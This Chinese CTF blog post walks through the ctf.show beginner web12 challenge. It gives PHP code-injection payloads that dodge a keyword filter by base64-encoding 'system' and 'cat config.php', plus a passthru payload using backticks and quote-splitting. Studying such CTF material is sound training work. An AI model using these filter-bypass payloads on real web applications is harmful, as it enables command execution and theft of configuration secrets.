CTF web之旅 15

最新推荐文章于 2024-10-16 11:23:07 发布
最新推荐文章于 2024-10-16 11:23:07 发布
阅读量51 收藏
点赞数
文章标签: 前端 linux 数据库 javascript 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45501486/article/details/133042158
版权
本文介绍了在CTF比赛中遇到的一个Web12挑战,涉及了文件名过滤与Base64编码的绕过策略。通过构造特定的payload,如使用`c=eval(base64_decode('system'));c('cat config.php'))`或利用反引号的优先执行特性来执行命令,成功获取到flag。该案例展示了在安全场景下对编码与命令注入的理解和应用。
摘要由CSDN通过智能技术生成

ctf show 萌新web12

文件名也被过滤掉

base64绕过

 

 构造paylaod

?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);

得到flag

或者是

对于反引号 在Linux中,`` 作用是优先执行里面的内容,再把里面的内容传给外面的语句。所以构造:

c=passthru("ca''t `ls`");
带点仙气的酷男子
关注
CTF工具之WEB.zip
10-07
【标题】:CTF工具之WEB.zip 【正文】: CTF(Capture The Flag)是一项网络安全竞赛,参与者通过解决各种安全挑战来展示他们的技术技能。这个名为“CTF工具之WEB.zip”的压缩包,显然是专门为参与此类比赛的选手...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
CTF Web学习笔记
01-11
### CTF Web学习笔记知识点详解 #### 杂项部分 **1. 隐写术** 隐写术是一种将信息隐藏于其他非秘密数据之中的技术,这种技术通常用于隐蔽通信或数据保护。在CTF竞赛中,经常出现的情况是将flag隐藏在图像、音频...
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTF工具之御剑后台扫描(web).rar
09-16
CTF工具之御剑后台扫描(Web)】 在网络安全领域,CTF(Capture The Flag)是一种流行的比赛形式,参赛者通过解决各种安全问题来获取分数。御剑后台扫描工具是专门为CTF比赛设计的一款Web渗透测试工具,主要用于...
004-按照指定功能模块名称分组
最新发布
xiaogang1226的博客
10-16 347
需要把一个功能模块的几个功能点放在同一个文档目录下,这几个功能点分布在不同的 Controller。需要把他们单独分组,方便前端对接。在@ApiOperation 里面增加属性 tags 赋值。
前端开发攻略---8种方法实现在浏览器中跨页面通信
nibabaoo的博客
10-15 1226
浏览器实现跨标签页通信的多种方式
前端地图数据开发
shuxiaoxii的博客
10-13 340
基于Turf.js教你快速实现地理围栏的合并拆分。turf js 地理空间分析库,处理各种地图算法。如何拆分一个乡镇或区的地图。获取市级的行政区域划分。直接导入地图的json。高德地图查看市级区域。js实现地图区域合并。
Element-plus el-form、el-dialog 数据回显同时用时,重置失效问题
Mr. Zhang Xiaojian's Blog
10-12 571
当第一次打开网页并点击“编辑”按钮时,虽然对话框变量变为 true 使对话框可见,但同步代码会将 formData 对象的属性设置为默认值。由于 Vue 的异步更新机制,DOM 实际上还未更新,因此表单组件内绑定了这些有值的初始数据。这样,在后续调用 resetFields 方法时,表单将会重置为这些默认值而不是空值。编辑时表单的初始值被设置成了回显的数据,而不是空字符串。时,表单会回到上次设置的初始值,即回显的数据。
基于monaco-editor的web日志组件
暗影刀客的博客
10-12 338
一个基于monaco-editor的web日志组件,支持灵活的扩展配置,支持vue和react
前端构建】Webpack: 现代前端开发的核心工具
鑫宝的博客
10-12 1683
在当今复杂的前端开发环境中,Webpack 已经成为了不可或缺的工具。作为一个强大的静态模块打包器,Webpack 不仅简化了开发流程,还大大提高了应用程序的性能和可维护性。本文将深入探讨 Webpack 的核心概念、基本配置、高级特性以及最佳实践,帮助开发者更好地理解和使用这个强大的工具。
利用session机制造测试账号,无需前端也可以测试后端接口
lilaihao1030的博客
10-12 423
适用场景:我们在测试的时候经常会遇到前端还没有开发完毕,后端已经结束开发了,但是后端的有些接口是需要特定的账号身份调用才会生效,此时因为前端未开发完毕,所以我们不能通过web页面进行登录,那么如何解决这个问题呢?session机制就可以解决。现在浏览器中手动登录一个符合需求身份的账号(可以在生产/线上页面进行登录),然后通过浏览器Cookie中获取SESSION值,填写在Apipost的Cookie管理器中,如下图1。直接在工具中调用需要测试的接口,检查返回值是否正确。apipost工具下载地址。
如何查看GB28181流媒体平台LiveGBS中对GB28181实时视频数据统计的负载信息
10-12 539
@目录1、负载信息2、负载信息说明3、会话列表查看3.1、会话列表4、停止会话5、搭建GB28181视频直播平台1、负载信息 实时展示直播、回放、播放、录像、H265、级联等使用数目 2、负载信息说明 直播:当前推流到平台的实时视频数目 回放:当前推流到平台的回放视频数目 播放:当前观看直播和回放的在线人数之和 录像:当前正在云端录像的通道数目 H265:当前推流到平台的视频中编码为H265...
前端如何实现批量下载功能呢?
tan_xiao_tan的博客
10-14 392
**需求:***在不依赖后端的情况下,前端需要独立实现批量下载,且下载的文件需统一放在一个文件夹中并压缩。html2canvas可以实现截图功能。FileSaver 保存文件到本地。JsPDF 可以将文件生成pdf。JSZip 可以压缩文件。
JavaScript前端开发技术
Chujun123528的博客
10-12 1039
JavaScript前端开发是一个充满挑战和机遇的领域。随着技术的不断进步和用户需求的变化,前端开发者需要不断学习新知识、掌握新技能,以应对日益复杂和多样化的开发需求。同时,注重性能优化和安全实践也是前端开发不可或缺的一部分。通过不断探索和创新,我们可以为用户创造更加优质、高效和安全的Web体验。在JavaScript前端开发的学习过程中,建议从基础语法入手,逐步掌握DOM操作、事件处理、Ajax通信等核心技能。同时,关注最新的前端框架和库的发展动态,尝试将它们应用到实际项目中。
JavaScript函数
学无止境
10-14 714
和变量类似,函数必须先定义然后才能使用。使用 `function` 关键字定义函数。> function:函数、功能。
使用Rollup.js快速开始构建一个前端项目
胖蔡叨叨叨
10-14 758
Rollup 是一个用于 JavaScript 项目的模块打包器,它将小块代码编译成更大、更复杂的代码,例如库或应用程序。Rollup 对代码模块使用 ES6 模块标准,它支持 Tree-shaking(摇树优化),可以剔除那些实际上没有被用到的代码,从而生成更小的文件,这意味着它非常适合于现代 JavaScript 项目。
若依-医疗系统
m0_70812512的博客
10-14 1130
在门诊模块中我们要解决的问题是,对患者建档以及建卡,在挂号时收取对于的挂号费,在医生工作站中就可以对患者进行接诊,那医生工作站也设计到了员工排班当天值班的员工和员工的调休,设计到了这些还需要对他的部门和职位方面进行分配管理,那么在挂号选择值班医生时,就为当天值班的医生。现在继续来到医生工作站接诊,医生工作站里面我们可以对患者进行接诊,候诊,诊断,转住院,检查,检验等操作,这里开药就又要涉及到药品信息中的药房药库管理,开出去的药,减少对应的药品库存。人员管理,部门管理,角色管理等等等....
WebGl 如何给页面绑定点击事件
dlmyrt的博客
10-14 338
WebGL中给页面绑定点击事件,可以通过为WebGL的绘图上下文所在的元素添加事件监听器来实现点击事件的处理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值